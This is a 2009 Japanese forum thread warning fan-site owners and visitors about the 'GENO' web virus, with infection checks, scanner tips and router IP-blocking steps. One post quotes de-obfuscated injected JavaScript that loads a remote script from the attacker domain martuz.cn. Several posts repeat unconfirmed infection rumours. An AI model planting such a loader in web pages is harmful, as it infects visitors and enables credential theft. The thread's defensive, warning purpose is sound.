【管理も】同人サイト・GENOウィルス注意4【閲覧も】
1 :
GENO:
新種のコンピュータウィルスが流行っています。
感染サイトを踏んだだけで発症し、大半のアンチウィルスソフトで検知されません。
変化が早く、一部の検知可能なソフトも最新型には対応できていない状況です。
感染の場合ワクチンはなく、クリーンインスコ必須、パス変必須(FTPパス抜きされる)です。
現時点で大半のセキュリティソフトをくぐり抜けてしまうため、
とりあえずジャンル関係なく、全ジャンルでサイト管理人・閲覧者に感染チェックを推奨します。
特にサイト管理人は二次被害を起こしてしまいますので、早急な確認が望ましいと思われます。
・確認点
【sqlsodbc.chmが改ざんされていないかを確認】
Windows XP: 改ざんされていなければ
C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
Windows 2000: そもそも存在しないはずなので、
C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
【cmd.exe、regedit.exeが立ち上がるかどうか】
このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
前スレ
【管理も】同人サイト・GENOウィルス注意3【閲覧も】
http://changi.2ch.net/test/read.cgi/doujin/1242466997/ 同人サイト向け・通称「GENOウイルス」対策まとめ
ttp://www31.atwiki.jp/doujin_vinfo/
2 :
GENO:2009/05/16(土) 23:31:41 ID:Foa9EDXQ0
当スレでは感染報告については、注意喚起の観点から
・感染が認められたジャンル名
のみ報告OKです。
感染報告をする際は、ジャンル名・ジャンル内シリーズ名など
伏字・略称にせず、わかりやすく書いてくだささい。
晒しやウォチ、風評被害を防ぐため、個人サイトを特定できる形で話題に出すのはNGです。
また、アドレス晒しは、踏むとマジで危ないので絶対厳禁。
3 :
GENO:2009/05/16(土) 23:33:03 ID:Foa9EDXQ0
4 :
GENO:2009/05/16(土) 23:37:36 ID:wULRE1Ku0
5 :
.:2009/05/16(土) 23:41:17 ID:RB3rnXLV0
6 :
GENO感染報告ありジャンル一覧:2009/05/16(土) 23:43:22 ID:Gh3ZB53n0
同人サイトなどへの感染例が報告されたジャンル一覧。サーチや情報サイトなど閲覧者多数サイト感染による被害の爆発的拡大が予測される場合、特に()内に記載。
■アニメ系
エヴァ(小説サーチ) / 忍たま乱太郎 / プリキュア / 天体戦士サンレッド / コードギアス / レッツ&ゴー / イナズマイレブン
ガンダム:SEED、00 / ポケモン / ハルヒ
■少年漫画【週刊少年ジャンプ系】
リボーン(オンリー+プチオンリー告知サイト・ファンサイト) / ジョジョの奇妙な冒険+スティールボールラン/ ワンピース / テニスの王子様
デスノート / D.Gray-man / 遊戯王無印+GX+5D's / 銀魂 /
■少年漫画【Gファンタジーなど少年ガンガン系、小学館、その他】
鋼の錬金術師(オンリー告知サイト) / 隠の王 / 黒執事 / パンドラハーツ / コナン
■青年漫画
ヘタリア (PC鯖使用の携帯向け同盟) / おお振り(アンソロ告知サイト) / 福本:越境、銀金
■ゲーム【RPG、SRPG、ACT】
幻想水滸伝 / テイルズオブ:ジアビス / STAR OCEANシリーズ / INFINITE UNDISCOVERY / メガテン:真、サマナー、ライドウ、P4 /
戦国BASARA(アンソロ告知サイト) / 戦国無双 / バイオハザード / セブンスドラゴン / ゼルダの伝説 /
■ゲーム【乙女、BL、男性向け】
Vitamin / 遙かなる時空の中で / Starry☆Sky / クインロゼ / 薄桜鬼 / 金色のコルダ /
ニトロプラスキラル:咎狗(アンソロ告知サイト)、sweet pool / 鬼畜眼鏡 /
Fate / ひぐらし
■ゲーム【アーケード、シューティング、格闘、シュミレーション※SRPG除、その他】
ポップンミュージック / ビートマニアUDX / 東方 (超大手感染情報) / ブレイブルー / 牧場物語 / 逆転裁判 /
■小説・ライトノベル - 小野不由美(サーチ) / ハルヒ
■創作 - 創作小説 / 男性向け創作同人ゲーム / 女性向け創作同人ゲーム / オリJUNE
■特撮 - 仮○ライ○ー:電王、剣、
■生モノ - ジャニーズ:K○T-TUN、N○WS / テニミュ(ファンサイト) /
■その他・音源系 - ボーカロイド(サーチ) / Sound Horizon /
■他の接触確率の高そうな報告例 - 非同人系ゲーム同盟サイト / 模型イベントホビーコンプレックス告知サイト
7 :
GENO:2009/05/16(土) 23:43:55 ID:yglYJEG80
8 :
GENO:2009/05/16(土) 23:45:35 ID:lqJkBEFe0
アクティブスクリプトは切らなくても大丈夫だよね?
9 :
GENO:2009/05/16(土) 23:45:54 ID:ku3DnmWq0
これがテンプレ1じゃないの?
>>1 新種のコンピュータウィルスが流行っています。
感染サイトを見ただけで感染発症し、大半のアンチウィルスソフトで検知されません。
変化が早く、一部の検知可能なソフトも最新型には対応できていない状況です。
全ジャンルでサイト管理人・閲覧者に感染チェックを推奨します。
特にサイト管理人は二次被害を起こしてしまいますので、早急な確認が望ましいと思われます。
【よくある質問】
Q:感染するとどうなるの?
A:あなたのパソコンに侵入したウイルスは、ネットに繋がった時点で
パスワード、クレジットカードの情報、FTPのパスワードなどを抜いてしまいます。
感染者のパソコンからアップされたサイトのファイルにウイルスコードが自動挿入され、
そのサイトを見た人を感染させます。
Q:VistaとMacは感染しないの?
A:某企業サイトでの発見直後はVista、Macには感染しないと言われましたが
新種も現れており安心できる状況ではありません。
詳細・感染の確認方法・対策は以下のまとめWikiと
>>2-5あたり
同人サイト向け・通称「GENOウイルス」対策まとめ
ttp://www31.atwiki.jp/doujin_vinfo/
10 :
GENO:2009/05/16(土) 23:46:14 ID:B2Gy9GKyO
自ジャンルの行きつけサイトが感染してるか調べたいんだけど、
サイトが感染してるか調べられるチェッカーのアドレスを教えてもらえないでしょうか
サイト ウィルス 感染 チェッカー などで検索したけど見つからず。
11 :
GENO:2009/05/16(土) 23:46:19 ID:n+WlS5TX0
こちらでもまとめwiki管理人さんへのレスは
>>3でいいのかな?
12 :
GENO:2009/05/16(土) 23:47:10 ID:rAXcQTqc0
>600 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 23:40:25
>var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;
>
>if(
> (u.indexOf("Chrome")<0)&&
> (u.indexOf("Win")>0)&&
> (u.indexOf("NT 6")<0)&&
> (document.cookie.indexOf("miek=1")<0)&&
> (typeof(zrvzts)!=typeof("A"))
>){
> zrvzts="A";
> eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
> document.write("<script src=//m"+"artuz.cn/vid/?id="+j+"><\/script>");
>}
>
>埋め込まれたJavaScript攻撃コードを読みやすくした奴がこれな
>616 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 23:44:55
>
>>600 >これだと、ChromeとNT 6以上を除外してるだけだな。
>Firefoxも対象だ。
Firefoxでも感染の危険はあります
IE専用ではありません
13 :
GENO:2009/05/16(土) 23:47:19 ID:3XYk/yWd0
このサイトは既出か?
参考にしてほしい。
http://www.virustotal.com/jp/ Virustotal は 疑わしいファイルを解析するサービスであり、
ウイルス、ワーム、トロイの木馬およびアンチウイルスエンジンにより
検出される全てのマルウェアを素早く簡単に検出します。
14 :
GENO:2009/05/16(土) 23:47:27 ID:nfr3SLFy0
16 :
GENO:2009/05/16(土) 23:47:48 ID:ROAp4ioF0
自分のサイトのソースを見れば確認できるって
もしかしてサイトの全ファイルのソースを書き換えられてしまうの?
17 :
geno:2009/05/16(土) 23:47:56 ID:rHuvw5CU0
FC2繋がらないな
重いだけ?
19 :
GENO:2009/05/16(土) 23:48:21 ID:58PrCe2G0
>>10 http://wepawet.cs.ucsb.edu/ ここで「URL」と書かれている右のフォームに
感染が疑われるURLを入力。
「Resource type」のチェックボックスは「JavaScript/PDF」にチェックを入れ、
「Submit for analysis」をクリック。
引用だけど
>>16 家の場合はサイト内の8割が改変されてたよ
21 :
GENO対策:2009/05/16(土) 23:49:13 ID:nV8r8NAz0
BuffaloのルータでのIP遮断方法を書いておく。機種はWHR-HP-AMPG
Buffaloのほかの機種でもいけると思うから自分の環境に合わせて読んでくれ。
http://192.168.11.1/ に接続
左側のメニューから
ネットワーク設定→パケットフィルタ
右側の画面から
「IPフィルタ登録情報の編集」というボタンを押す
>>3から拒否すべきIPを全て登録する
動作:無視
方向:WAN→LAN,LAN→WANの両方
プロトコル:全て
IP:以下に記載(現時点で発見されているIP。IPの後の『/xx』も入れること。)
WAN→LANなら「送信元」、LAN→WANなら「宛先」の欄に入れること。LAN側のIPは入れなくてよい
94.229.65.160/27
94.247.2.0/23
95.129.145.58
95.129.144.0/23
78.109.29.112
以上です。正直パケットフィルタとか初めてやったので間違えてるかもしれないけど・・・
参考になったら幸いです。あと、ググッたら「すぐ破られる」と書いてあったので他の対策とあわせてやってください。
22 :
GENO:2009/05/16(土) 23:49:20 ID:K1qg2EC/0
>>17 うちも繋がらない>fc2
で、fc2の板を探そうとしたら検索サイトが開かなかった
23 :
GENO:2009/05/16(土) 23:49:20 ID:8aiojYSy0
24 :
GENO:2009/05/16(土) 23:49:21 ID:iOkodBoz0
自分もFC2繋がらない。
FC2が引っ掛かったから緊急シャットアウトとかかな・・・
25 :
geno:2009/05/16(土) 23:49:21 ID:DB2jANJ60
26 :
げの:2009/05/16(土) 23:49:27 ID:yjXi9+2x0
FC2繋がらなくなった。
自サイトもブログも。
こんなときにやめてくれよ。
激烈に重いが、びみょーにつながったりもする。
27 :
GENO:2009/05/16(土) 23:49:39 ID:ROAp4ioF0
>20
早い回答ありがとうございます
たくさんHTMLファイルあるからどうしようかと思った
28 :
げの:2009/05/16(土) 23:49:39 ID:7FGPskzy0
fc2がつながらなくなったが
いつもみたいにただ重いだけかそれとも…
29 :
GENO:2009/05/16(土) 23:49:45 ID:gHKu351l0
ダウンアド=GENOウイルスって訳でもないらしいけど
仕組みを分からせるのには良さそうだね
>>7 あと前スレ995
本当に行ったんかいww
30 :
GENO:2009/05/16(土) 23:50:16 ID:uACsvbNb0
>>前スレ960
IP遮断するのはファイアウォールの設定じゃないか?
Avast!はアンチウイルス機能だけでFWの機能は無いから、
Windows標準のか他のソフトなりで遮断する必要があると思う
>>3のwikiは見ても大丈夫?
最近サイト巡りしてないとはいえ気になるからチェックしたいけど
wiki自体が感染してるとかはない?
32 :
geno:2009/05/16(土) 23:50:47 ID:rHuvw5CU0
FC2、この時間帯はいつも重いけど
即座に繋がりませんって出る。
こんなんは初めてだな。
34 :
geno:2009/05/16(土) 23:51:56 ID:VZAxL7mn0
該当ジャンルサイトさんのブログでこのウイルスのこと注意してて、
『私のサイトは大丈夫そうでしたが』とあったから、暇つぶしに見に行こうとしたら繋がらなくて死ぬほどビビった。
fc2…こんなときに止めてくれ……ウイルスじゃないよな?即cmd.exe開けるか確認してしまった
35 :
GENO:2009/05/16(土) 23:51:56 ID:bmeWatfA0
>>10 サイトが感染してるか調べられるんじゃなくて、
あくまでもソースをチェックして感染してるかどうかを
自分で確認するんだからな。
36 :
GENO:2009/05/16(土) 23:52:11 ID:gdDGoX/z0
みんな同じ事をするからな
37 :
GENO:2009/05/16(土) 23:52:19 ID:K1qg2EC/0
ほんの数分前には普通に繋がったんだ。
うち、日記がfc2で、書き込んだばっかり。
編集しようとしたらもう繋がらなかった
38 :
GENO:2009/05/16(土) 23:52:20 ID:lFaYB71c0
問題のサイトをぐーぐる先生でみるだけで
avestタソが怒るんだが・・・
40 :
GENO:2009/05/16(土) 23:52:34 ID:LBtKWh8f0
fc2全滅じゃね
まさか…
41 :
GENO:2009/05/16(土) 23:52:42 ID:8aiojYSy0
>>31 今WIKIは管理人しか編集できない
さらに言えば@Wikiでは仮に管理人が感染しててもページが感染することは今のところありえない
42 :
GENO:2009/05/16(土) 23:53:11 ID:7dnbfNTZ0
>>1乙
IEでフラッシュプレーヤーの更新出来ねえファックファック
43 :
GENO:2009/05/16(土) 23:53:13 ID:UxKcM6KI0
FC2はいつものことじゃねーの?
44 :
GENO:2009/05/16(土) 23:53:19 ID:HRO9Px/yO
凄い勢いでスクリプト書き換えてるみたいだね>ウィルス
火狐陥落も時間の問題かも…
46 :
GENO:2009/05/16(土) 23:53:37 ID:zQ8TpxQP0
47 :
GENO:2009/05/16(土) 23:53:41 ID:yglYJEG80
4gamerとファミ通が感染したぞーパンデミックじゃ(^o^)ノ
48 :
GENO:2009/05/16(土) 23:53:41 ID:JgNomp/j0
前スレで
>あとFlashはブラウザごとに更新がひつようだからな。
>IEでFlashを最新にしても火狐のFlashは最新にならない。
>別におこなうのが必要。
って書いてあったけど、さっきFirefox自体をインストールしたばっかりの場合は、
Firefox用のFlashはそもそも入ってないって状態のこと?ならこのままFlash入れない方がいいの?
それとも一番古いFlashが入ってるとかで、更新しないと危ない?
49 :
GENO:2009/05/16(土) 23:53:56 ID:MgxF5koh0
fc2ブログ37鯖74鯖78鯖即座に404
50 :
GENO:2009/05/16(土) 23:54:20 ID:ULswC4HQ0
こっちもつながらん。FC2もか?
51 :
GENO:2009/05/16(土) 23:54:24 ID:0pJ5yLiI0
fc2ブログで感染してるのがあった、なかったって話があったから
運営側が一旦全部止めてチェックかけてるんじゃないの
ってことはないか
52 :
GENO:2009/05/16(土) 23:54:37 ID:mT3cvEnF0
ここでLynx最強伝説を唱えておく
53 :
GENO:2009/05/16(土) 23:54:44 ID:l9kNc3YY0
>>1乙
最近活発なジャンル者なんだけど、昨日ここ見てHPに注意載せた
今日アクセスログでブラウザ情報見たらIE6が25%でIE7が50%
JS切りも全体の5%に満たないとか…
ここ見てると騒ぎすぎなのかなってくらいに見えるけど
実際対応してる人って、かなり少ないんだな…注意載せる他に何すればいいんだろ?
fc2ホームページも同様につながらなくなった
55 :
g:2009/05/16(土) 23:55:10 ID:t+UZlBwU0
もう何がなにやら・・・
56 :
GENO:2009/05/16(土) 23:55:13 ID:Hd92Ml+u0
さっき見に行って自分とこは大丈夫なの確認したとこだFc2
57 :
GENO:2009/05/16(土) 23:55:13 ID:zlsW0HIw0
>>23 FTPのID,パスワードは抜かれるの確定だけど、
現段階では他のID、パスワードは不明。クレカ番号も不明
ただし、警戒は怠るな
として欲しいだけなんだけどね
wikiに載せるならあまりにも不正確だと信頼なくす
58 :
GENO:2009/05/16(土) 23:55:14 ID:PINN+4Rr0
>>29 呪いのプロってすごいね
冗談抜きで生半可な気持ちじゃ手を出してはいけない感じだった
まあFC2は少し前にも全鯖落ちとかしてたし
60 :
GENO:2009/05/16(土) 23:55:24 ID:JLSn9lA+0
61 :
geno:2009/05/16(土) 23:55:36 ID:XwE+Ekmp0
ほんとだfc2繋がらない。
チェック中なのかな。
62 :
GENO:2009/05/16(土) 23:55:41 ID:QEvo2/9u0
63 :
GENO:2009/05/16(土) 23:55:41 ID:gdDGoX/z0
>>31 ここは平気でも普通のwikiは感染ページにリンク張られたりするから注意
64 :
GENO:2009/05/16(土) 23:55:50 ID:ZbIJF7pO0
>>51 それならいいんだけどな…
サイト閉めたけど閉めましたindexのみ置いてるんでちょっと気になってる
65 :
GENO:2009/05/16(土) 23:55:53 ID:K1qg2EC/0
>>52 流石にテキストブラウザはちょっと
不便すぎやしないか今の時代
67 :
GENO:2009/05/16(土) 23:55:58 ID:9x6H1Z+40
4亀感染とかマジかよ…
68 :
GENO:2009/05/16(土) 23:56:09 ID:da7uuXa20
>>51 それなら大歓迎
でもどうせ週末恒例のエラーですよ
69 :
GENO:2009/05/16(土) 23:56:11 ID:0pJ5yLiI0
>>42 IEだけどできたぞ
更新する時だけはJava許可しとけよー
70 :
GENO:2009/05/16(土) 23:56:30 ID:Q7OewXfV0
71 :
GENO:2009/05/16(土) 23:56:36 ID:wT7QWP+FQ
Vistaは感染しないの?
72 :
GENO:2009/05/16(土) 23:56:50 ID:PUrWwnAeO
73 :
GENO:2009/05/16(土) 23:56:53 ID:BpSFSHPIO
74 :
GENO:2009/05/16(土) 23:56:56 ID:8lxpStGl0
>>43 いや自分とこもFC2だが
サイトは恐らく読み込み済みのデータだからすぐ出てきたが
ブログが出てこない。異常に遅い。ちなみにブログのサーバーは60
怖くなったからすぐ閉じたけど
75 :
GENO:2009/05/16(土) 23:56:57 ID:uT/VnXVX0
76 :
前スレ914:2009/05/16(土) 23:57:45 ID:2fUnOYk6O
スレの流れ早すぎw
うちもソースチェッカー始めたら、さっそくFC2のサイトさんが全滅気味
前スレ
>>964 ありがとう
とりあえず自分もMacからソースチェッカー地道にやってみた
LinuxやMacまでターゲットなあしゅが出きたらもう\(^o^)/オワタ
77 :
GENO:2009/05/16(土) 23:57:56 ID:n4RlFrPrO
Fc2は全鯖落ちてるが
最近定期的に鯖死亡してるからGENOとは関係ないと思われ
78 :
GENO:2009/05/16(土) 23:57:57 ID:EXe9O8oqO
とりあえず感染したら
必要なファイルは外付けに移動させれば大丈夫だよな
特定ファイルにしか感染しないし
79 :
GENO:2009/05/16(土) 23:58:08 ID:JQfIRf1nO
>>47 見に行ったけど何もないぞ
ソースも普通だし
80 :
GENO:2009/05/16(土) 23:58:17 ID:5bvZ/sVU0
81 :
geno:2009/05/16(土) 23:58:26 ID:VrAYnuWt0
もっと注意喚起した方が良いんじゃないの?
Yahooとか働けよ。
82 :
GENO:2009/05/16(土) 23:58:27 ID:k/s6NXut0
83 :
GENO:2009/05/16(土) 23:58:57 ID:nylX4fmQ0
作ったやつこんだけ個人情報集まりすぎてどうしたらいいのか
本人もパニックになっていると推測
84 :
GENO:2009/05/16(土) 23:59:10 ID:i6/Zrtyj0
>>75 うわああああああああああ
誰だこの回答した奴うううう
85 :
GENO:2009/05/16(土) 23:59:14 ID:b69uh3pi0
JavaScript切れば、ネサフしてもおk?
86 :
GNEO:2009/05/16(土) 23:59:14 ID:I7q4xqqN0
まぁ日ごろからメンテしてない奴の自業自得だよな
88 :
GENO:2009/05/16(土) 23:59:20 ID:wMPohdfc0
89 :
GENO:2009/05/16(土) 23:59:22 ID:THuk9Xnl0
20分くらい前
>>3のwiki見たら中国語?みたいな感じで化けてて
エンコード変えてみても化けてて
ウィルス感染かと思って不安になったんだけど
前スレ見てもあまり書いてないし今は化けてないみたいだし
ウィルス感染かどうかわかりますか?
90 :
GENO:2009/05/16(土) 23:59:43 ID:ps5/AV/I0
>>47 みたいなのは複数の具体的なチェック結果報告がない限りスルーしろって
昨日から何回もこういうガセ書き込んでる奴いるだろ
91 :
GENO:2009/05/16(土) 23:59:46 ID:58PrCe2G0
しかしこれ下手したらネット世界終了のお知らせ!とかなりかねなくないか
92 :
geno:2009/05/17(日) 00:00:04 ID:VZAxL7mn0
これいつになったら落ち着くんだろう…むやみに検索もネサフも出来やしない
早くおさまってくれるといいな
94 :
g:2009/05/17(日) 00:00:12 ID:t+UZlBwU0
95 :
GENO:2009/05/17(日) 00:00:46 ID:bPRe9cR10
いつだか書き込みした者だけど
「非同人系ゲーム同盟サイト」って自分が書き込みした奴だろうかね。
今日見てみたらウィルスの反応なし。avestさんも警告しなかった。
結局感染してたみたいだが、報告とかお知らせとか全く無し。
96 :
GENO:2009/05/17(日) 00:00:47 ID:tBxS3QZB0
もしもう答えが出ていたらすみません。
Windowsに元からあるセキュリティ設定の
「制限つきサイト」にもIP入れておいたほうが良いですか?
一応スクリプトなんかをブロックすると書いてあったので
気休め程度にはなるのでしょうか
97 :
GENO:2009/05/17(日) 00:00:59 ID:6n0HuwqP0
こんな時に釣りとかアホか
98 :
GENO:2009/05/17(日) 00:01:15 ID:NoJwz4rA0
99 :
GENO:2009/05/17(日) 00:01:15 ID:2LNaQ+620
>47
誤報だった場合
後日損害賠償請求される事もあるから慎重に
100 :
.:2009/05/17(日) 00:01:58 ID:RB3rnXLV0
101 :
GENO:2009/05/17(日) 00:02:08 ID:wMPohdfc0
>>99 それくらい知ってて確信を持ってレスしたと思ってるから皆食いついたんだろ
102 :
geno:2009/05/17(日) 00:02:11 ID:+10WbMtBO
>>12 MacでブラウザはSafari
大丈夫だよね?
103 :
geno:2009/05/17(日) 00:02:23 ID:rPGIPHzV0
fc2やばいの?
ロリポとか忍者とか有名鯖はどうなの?
104 :
3:2009/05/17(日) 00:02:30 ID:nbm7ZJwf0
>>3のまとめ管理人です
新スレ乙、正直流れが速すぎて必死w
ミスのないよう落ち着いて更新していこうと思うので、Wikiにかかわる情報は
>3へアンカつけてレスしてください
このレスはWikiにあったらいいな、とかいうのも、>3で
現在35まで確認、前スレの分も含めてすべて追加修正したつもりなので
各自確認・指摘をお願いします
105 :
げの:2009/05/17(日) 00:02:36 ID:0pJ5yLiI0
>>96 IP指定するよかまるっとjs切断の方が無難じゃないか?
IP指定するならファイアウォールの方で
106 :
GENO:2009/05/17(日) 00:03:08 ID:iFSNZlAy0
ちょっとカスペ先生で質問なんだが、オンラインスキャンはやっぱ全体じゃなきゃだめ?
いや、検索時間ながくてなぁ……。
107 :
t:2009/05/17(日) 00:03:12 ID:zLDd1PV90
108 :
GENO:2009/05/17(日) 00:03:58 ID:7dnbfNTZ0
>>69 JavaScript許可しても何しても無理だー
てか何でこんな訳分からん方法でしかインストールできないんだよ
109 :
GENO:2009/05/17(日) 00:04:09 ID:SYlr4Eba0
>>104 まとめ管理人さんマジ乙
適度なところで睡眠取ってくだされ。
おまいらも適当なとこで寝ろよ。睡眠不足は思考力を下げる原因になるからな。
110 :
GENO:2009/05/17(日) 00:04:53 ID:qU7y8KVc0
とにかく自分達が楽しければ、セキュリティ対策なんてどうでもいいと思ってる奴が
腐女子に多いからこれだけ同人サイトに広まったんだろうね
感染した奴はこれを機会に100万回は反省しとけ
タダでさえ腐はいろんな場所でウザがられてるんだから
それ以外でこれ以上迷惑かけるなといいたい
111 :
GENO:2009/05/17(日) 00:04:59 ID:5Tx9q+4S0
カスペでスキャンできないのは何故なんだorz
112 :
GENO:2009/05/17(日) 00:05:02 ID:pD99LGaB0
前スレでセキュリティソフト重複させるとアウアウって聞いたけど、
>>30のようにavastとWindowsFirewallって重複させても大丈夫なの?
113 :
GENO:2009/05/17(日) 00:05:52 ID:PJeOGuCL0
>106
体験版落としてローカルで完全スキャンした方が早い。
320GBのノートPCでも40分くらいかかるけど、今回問題となっているFlash・AcrobatReaderの
旧バージョンは100%「脆弱性に問題あり」として隔離か削除を推奨してくる。
114 :
GENO:2009/05/17(日) 00:06:05 ID:O/DTZ3Lf0
まとめの人乙…
fc2はID含め全面的につながらん
週末の夜だとしてもまったくだめだ
チェックしてくれてるんだといいんだけどなー
115 :
GENO:2009/05/17(日) 00:06:10 ID:rxL3qF7n0
>>110 ドサクサ紛れの腐女子叩きをしている場合じゃない
116 :
geno:2009/05/17(日) 00:06:23 ID:GytLXJEE0
117 :
GENO:2009/05/17(日) 00:06:38 ID:kLq69xxq0
>>111 javascript切ってると出来ないぞ
118 :
GENO:2009/05/17(日) 00:06:51 ID:mXU46OMrO
イーセットで検出出来る?
119 :
GENO:2009/05/17(日) 00:07:06 ID:9u3fpjKy0
>>112 FWはセキュリティソフトとはまた違うのでは
120 :
ge:2009/05/17(日) 00:07:37 ID:5CCIkoK20
FC2は前から一部のサイトが改ざんされてるウンタラカンタラって運営の方から
告知はあったから
この際大々的にやってるのかもしれないと信じたい
121 :
GENO:2009/05/17(日) 00:08:21 ID:U33DfpPQ0
>>115 だけど女に知識が乏しい人が多いのも事実なわけで
携帯からざっと見たけど注意喚起してるとこも話題に出すとこも
あまりにも少ない
むしろ平常どおりにしてるとこなんてザラだった
サーチ管理人にもメール出したけど反応ない
122 :
GENO:2009/05/17(日) 00:08:32 ID:VX7Lo5H7P
スキャンは寝てる間とか会社に行ってる間にすればいいだろ
123 :
GENO:2009/05/17(日) 00:08:46 ID:p+RhLi6R0
>>105 即レスありがとうございます
一応火狐でジャバスクは切り、最低限の対策はしたのですが
制限つきサイトにも入れておいたらまた何か違うのだろうかと思ったもので。
やっぱりジャバスク切ってソース確認が一番の回避法なのでしょうか
124 :
GENO:2009/05/17(日) 00:08:56 ID:RKe2VDEW0
>>3まとめサイトの管理者様へ
FWのIP遮断の設定方法について
今現在Norton Internet Security(ver.16.5.0.135)の設定方法のみが掲載されているようですが
旧バージョン使用者のために
ついさっきまであった、ノートン2008での設定方法も併記しておいてもらえると助かります。
125 :
GENO:2009/05/17(日) 00:09:15 ID:LoBLoCup0
>>3 >>57にあるように、
現段階ではFTP以外の(各種ウェブサービスで使われる)ID、パスワードやクレカ番号
が盗まれるかどうかは不明です。警戒しといたほうがいいことは確かですが。
126 :
geno:2009/05/17(日) 00:09:27 ID:kDSj2MIb0
今更だけどさ…前スレ935は火狐をDLしたいんじゃないの?
なんかFlash最新版の話になっててスッキリしなかったんだけど
127 :
108:2009/05/17(日) 00:09:32 ID:Bie8Ee4B0
>>69 インターネットのセキュリティ下げたら出来たわ
adobeのサイトは信頼済みサイトに放り込んでたからそっちだけ下げれば良いと思ってた
こんな形式でしかアップデート出来ないのはマジで勘弁して欲しい
128 :
t:2009/05/17(日) 00:09:57 ID:4MOMvxOF0
感染サイトが閉鎖されていない時点で
GENOサイトをもう悪くいえないな
129 :
GENO:2009/05/17(日) 00:10:08 ID:pnEiQLkWP
女向け同人は確かにこういうの面と向かって注意しにくい雰囲気あるよな。
ネトゲでウィルス流行したときとかは、
感染して放置の掲示板とかブログはURL(リンクしないように置き換えして)張られてたが
「個人のサイトは晒しになるからだめー」とかそういうノリだもん。未だに。
130 :
GENO:2009/05/17(日) 00:10:15 ID:LjT7ESiT0
131 :
げのさいど:2009/05/17(日) 00:11:03 ID:qmRuZ8HiO
>>108 インストール開始時も完了時もウィンドウ出ないから気づいてないだけじゃないか?
完了したらFLASH流れる
あと開始前にブラウザの黄色いバー押せって書いてあったけど
製品によっては出ないみたいで自分は出なかった
紛らわしい製品もあるし、偽物もあるから気をつけてな
132 :
GENO:2009/05/17(日) 00:11:06 ID:x42KFcCa0
>>106 カスペ重要の方でスキャンしたけど、それでも2時間かかったw
完全の方が安心できると思うけど、重要でもsystem32をスキャンしてたからいいんじゃね?
よくわかんないけど
ぐぐったけどそれらしいのが出てこなかったんで教えてください
Java Scriptを切ったんだけど、特定のサイトのみ有効にするって事は出来ない?
JS切ったら常駐スレをread.htmlで見れなくなったからさ
>>129 ようするにセキュリティより自分達が大事ってことだろ
自分達がよければ一般人に迷惑かけてもおkって
思考回路なんだろうなぁ
>>3 テイルズアビスだけじゃなくね?VとS取り扱いサイト感染してるよ
135 :
GE:2009/05/17(日) 00:11:50 ID:O6lqE1pR0
一気にセキュリティの認識たかまったな。
136 :
GENO:2009/05/17(日) 00:11:52 ID:9u3fpjKy0
>>121 確かに、自分が再三注意をあげてたら友人がミクシで記事かいてくれたんだが
今のところレスは付いていない様子。同人での交流が盛んだしなんらかの反応があることを期待してたんだがなあ
危機感がないというか、対策ソフト入れてりゃ大丈夫だろー程度の認識の人は多いと思う
137 :
GENO:2009/05/17(日) 00:11:54 ID:ugI/Fqnf0
fc2繋がった。
ほんとビックリするぜ、もう・・・
139 :
GENO:2009/05/17(日) 00:12:23 ID:o+iDNMbs0
ウイルスセキュリティZEROを使用中なんだが、こいつでGENOを防げる気がしない
ZERO使用中なのにavastインストールするのはまずいのかな
>>3 >>134の補足
V=テイルズオブヴェスペリア
S=テイルズオブシンフォニア
141 :
厨:2009/05/17(日) 00:13:01 ID:XKBQigeq0
自サイトにwiki貼って注意喚起したら
火狐で見てる人がグっと増えたな
辺境サイトでも一応効果はあるみたいでヨカタ
142 :
げの:2009/05/17(日) 00:13:03 ID:4cH5DQKP0
FC2戻った。
ほっ
143 :
GENO:2009/05/17(日) 00:13:04 ID:UcJvvm1mO
>>133 てか個人情報抜かれる危険性あるだけで
めちゃ火の粉ふりかかってるんだがな…
144 :
GENO:2009/05/17(日) 00:13:19 ID:SsvMmXpe0
ふうむ。
まあオフ版をダウソするかな……
145 :
GE:2009/05/17(日) 00:13:30 ID:O6lqE1pR0
146 :
69=131:2009/05/17(日) 00:13:45 ID:qmRuZ8HiO
>>127 入れ違いだったな
とりあえずよかったけど、DLのアドレスと大元とでドメイン違うのは結構あるぞ
まあ、あの形式もどうかと思うが手軽でもあるから一長一短かもな
147 :
ゆとり:2009/05/17(日) 00:14:03 ID:QjVsYyX80
>>139 ウイルスセキュZEROのうpだて怠慢が酷くてavastに乗り換えた俺参上
原田ウイルスの時は苦労したぜ・・・
148 :
g:2009/05/17(日) 00:14:06 ID:jpopUHeK0
カスペノオンラインスキャンしようとしたら何回やっても
アップデートに失敗しましたってのが出て進めない、
どうすれば解消するんでしょうか
ノートンじゃ反応しないけど
カスペ先生だと真っ赤orz
ただcmd.exe、regedit.exeも立ち上がるんだよな
どういうこっちゃ
150 :
GENO:2009/05/17(日) 00:14:15 ID:PJeOGuCL0
>132
Firefox+NoScriptでストップをかけているなら「一時的に許可」できますが
騒動が落ち着くまで常駐スレを専ブラで見ようとは思わないのですか?
151 :
GENO:2009/05/17(日) 00:14:19 ID:rMpIh1Ek0
まとめサイトにあるウイルス対策ソフトじゃなきゃ
解決できんのか?
152 :
GENO:2009/05/17(日) 00:14:31 ID:G5ZQ6xeC0
FC2で作成したサイトは普通に立ち上がるし、23鯖ブログも立ち上がりました。
どこも時間差があるだけの一時的なものだと思います。
>>139 とりあえずいれとけ
重複してもそれ程問題ない
ZEROタソはスルーだぞw
154 :
GENO:2009/05/17(日) 00:15:04 ID:YMu+9f/FO
>>121 通報者への返信よりも対策を優先させてもらって、落ち着いてからお礼の連絡したりするけど…どうなんだろうね?
管理用メールを携帯に転送させてる人じゃないと、気付くの遅いかも
FC2繋がるとこもあるんだね
155 :
geno:2009/05/17(日) 00:15:23 ID:9wncY9JGO
あんまり男管理人に夢見ない方がいいよ…男性向けジャンルだからこそ思うw
156 :
GENO:2009/05/17(日) 00:15:23 ID:4MOMvxOF0
>>149 テンプレ見ておかしいところ無ければ兵器じゃね?
157 :
GENO:2009/05/17(日) 00:15:37 ID:DOJfiSq80
認識甘いのは腐女子に限った話でもないと思うが
前スレでも誰か言ってたけど、
同人界は個人サイトの観覧者の大部分が
サイト管理者でもあるという特徴があるからなあ
